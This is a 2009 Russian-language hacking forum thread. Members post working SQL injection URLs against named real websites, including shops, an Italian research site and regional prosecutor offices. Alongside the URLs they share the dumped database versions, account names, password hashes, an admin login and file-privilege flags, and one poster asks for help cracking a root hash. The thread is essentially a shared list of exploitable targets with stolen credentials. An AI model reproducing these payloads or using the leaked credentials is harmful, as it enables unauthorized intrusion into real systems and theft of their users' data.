HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.03.2009, 11:21
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

Цитата:
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,version(),user(),databas e()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40--
Version:5.0.45
User:root@localhost
Databasei2s2_applications


Цитата:
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,user,password),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+fr om+mysql.user--
root:40dcd73246a08b24
user_appweb:60776d8c1b2603fe
support_cometa:4d88db586081c8e1
support_gilda:59456f66536f08a2
quest_user:3fca398228ffeb0d
cometa:0b0499ae0af29196
triadmin:4db2e1f0371bb23c
user_trigrid:799f669976a96721
user_gridct:071161424fdd32d6
user_tutorial:5a6f10b433888a81
sgadmin:40b75bf20b89fd7f
cdsprova:12bb79285094f6c9
momentaneo:12bb79285094f6c9
cdscometa:2d98430975596ec0
cdsagenda:3285d95736219716
user_egroup:309830266c320655
inveniocometa:2a67070b5a1f24d6
cds_cometa:5c8b8ed8746fe245
cometaagenda:0b0499ae0af29196
user_application:60776d8c1b2603fe
school_cairo:40b743500b89f4dd
quest_infn:3f17c5654c4efe74
joomla_cometa:2526327f78e49d24
grisu_user:05e18b2f6159ffb3
emidio_test:4200820054e0fa20
userinaf:45359d850a65b59c
na4_appl:3a696946195acda9
 
Ответить с цитированием

  #2  
Старый 07.03.2009, 12:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://atecdrexim.ro/textile/index.php?command=categproduse&sid=-10+union+select+1,concat_Ws(0x3a,version(),databas e(),user()),3,4,5

Database Version: 5.0.67-community-log
Database name: atecdrex_textile
User name: atecdrex_user@localhost
 
Ответить с цитированием

  #3  
Старый 07.03.2009, 12:36
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Pagerank: 5
тИЦ: 800


Код:
http://www.tabe.ru/news/index.php?a=-1+union+select+1,concat_ws(0x3a,version (),databa se(),user()),3,4,5,6--&y=2009
Database Version : 4.0.27-log
Database name : tabe
User name : tabe@pm1.zenon.net


-------------------------------------------------+

Pagerank: 3
тИЦ: 750


Код:
http://www.zamoroz.ru/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ ws(0x3a,version(),d atabase(),user()),8,9--
Database Version : 5.0.67-log
Database name : u9557
User name : u9557@10.10.153.176


вывод юзверей с форума, без лимита:

Код:
http://www.zamoroz.ru/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,usern ame,password),8,9+from+ phorum_users--
Код:
"Заморозь.ру":c19f8c2ed4e1db99593c23783528aaa9

Последний раз редактировалось f1ng3r; 07.03.2009 в 12:46..
 
Ответить с цитированием

  #4  
Старый 07.03.2009, 13:03
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

заказ цветов

Код:
http://www.floryon.ru/?page=details&wid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
 
Ответить с цитированием

  #5  
Старый 07.03.2009, 13:16
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

www.htec.co.th

Код:
http://www.htec.co.th/security_%20fire.php?id=220+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

version: 5.0.51a-24-log
user: fang@localhost
database: product
 
Ответить с цитированием

  #6  
Старый 07.03.2009, 13:35
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

ещё цветочки) что то меня сегодня пробило)

Код:
http://www.florazone.ru/catalogue/?sublist=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())--
ещё 1 сайтег)
Код:
http://www.64akalifi.ru/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),  user(),database()),7,8,9--

Последний раз редактировалось F4R; 07.03.2009 в 14:03..
 
Ответить с цитированием

  #7  
Старый 07.03.2009, 14:12
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.promholod.com/article.php?n=-1+union+select+conca t_ws(0x3a,version(),database(),user()),2,3,4--

Database Version : 5.0.45
Database name : promholod
User name : root@localhost


админ:

Код:
http://www.promholod.com/article.php?n=-1+union+select+concat_ws(0x3a,User,password,file_priv),2,3,4+from+mys ql.user--
file_priv Y

Код:
root:1a1d79c161260718:Y
если кто расшифрует, напишите если не трудно.
 
Ответить с цитированием

  #8  
Старый 07.03.2009, 14:12
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

Прокуратура Архангельской области

Код:
http://www.arhoblprok.atnet.ru/ru/news/show.asp?year=2009&id=86+union+select+1,2,3,4,5,6+from+news
Microsoft Access

____________________________________________

Прокуратура Московской области

Код:
http://www.mosoblproc.ru/news/?id=950+and+1=0+union+select+1,2,3,4,5,6--+&print=1
Ничего интересного T_T

Последний раз редактировалось R1dex; 07.03.2009 в 14:58..
 
Ответить с цитированием

  #9  
Старый 07.03.2009, 16:17
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Pagerank: 6
тИЦ: 2600

Код:
http://www.multiokna.ru/about/?ContentId=174&year=2009&month=02&id=-1+union+select+1,concat_ws(0x3a ,version (),database(),user()),3,4,5,6,7,8,9,10--
Database Version : 5.0.67-log
Database name : u49275
User name : u49275@10.10.223.225
 
Ответить с цитированием

  #10  
Старый 07.03.2009, 17:13
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

Код:
http://nautlib.ru/
PR: 5
Тиц: 70
Версия: 5.0.27-log
База данных: nautlib
Юзверь: root@localhost
Код:
http://nautlib.ru/auth.php?g=-54%20union%20select%201--
Админка: http://nautlib.ru/admin
Логин: joe
Пароль: $H$9We0hhRJHUh1BvNDil/V30fYgLKvjs1
mysql.user
file_priv=y

Последний раз редактировалось jokester; 07.03.2009 в 17:54.. Причина: Вопросы не сюда
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.